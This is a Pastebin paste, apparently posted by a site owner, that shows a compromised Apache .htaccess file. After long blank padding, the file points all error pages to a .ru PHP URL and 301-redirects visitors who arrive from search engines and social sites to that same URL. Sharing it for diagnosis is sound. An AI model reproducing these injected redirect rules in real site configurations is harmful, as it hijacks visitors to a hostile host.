Advertisement
jetskiron

htaccess corrupted 8-31-11 403 Forbidden error msg

Sep 15th, 2011
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.74 KB | None | 0 0
  1.  
  2.  
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53. ErrorDocument 400 http://promosoftware.ru/apacabar/inde.php
  54. ErrorDocument 401 http://promosoftware.ru/apacabar/inde.php
  55. ErrorDocument 403 http://promosoftware.ru/apacabar/inde.php
  56. ErrorDocument 404 http://promosoftware.ru/apacabar/inde.php
  57. ErrorDocument 500 http://promosoftware.ru/apacabar/inde.php
  58. <IfModule mod_rewrite.c>
  59. RewriteEngine On
  60. RewriteCond %{HTTP_REFERER} .*google.* [OR]
  61. RewriteCond %{HTTP_REFERER} .*ask.* [OR]
  62. RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
  63. RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
  64. RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
  65. RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
  66. RewriteCond %{HTTP_REFERER} .*qq.* [OR]
  67. RewriteCond %{HTTP_REFERER} .*excite.* [OR]
  68. RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
  69. RewriteCond %{HTTP_REFERER} .*msn.* [OR]
  70. RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
  71. RewriteCond %{HTTP_REFERER} .*aol.* [OR]
  72. RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
  73. RewriteCond %{HTTP_REFERER} .*goto.* [OR]
  74. RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
  75. RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
  76. RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
  77. RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
  78. RewriteCond %{HTTP_REFERER} .*search.* [OR]
  79. RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
  80. RewriteCond %{HTTP_REFERER} .*bing.* [OR]
  81. RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
  82. RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
  83. RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
  84. RewriteCond %{HTTP_REFERER} .*blog.* [OR]
  85. RewriteCond %{HTTP_REFERER} .*live.* [OR]
  86. RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
  87. RewriteCond %{HTTP_REFERER} .*mail.* [OR]
  88. RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
  89. RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
  90. RewriteCond %{HTTP_REFERER} .*ya.* [OR]
  91. RewriteCond %{HTTP_REFERER} .*aport.* [OR]
  92. RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
  93. RewriteCond %{HTTP_REFERER} .*flickr.*
  94. RewriteRule ^(.*)$ http://promosoftware.ru/apacabar/inde.php [R=301,L]
  95. </IfModule>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement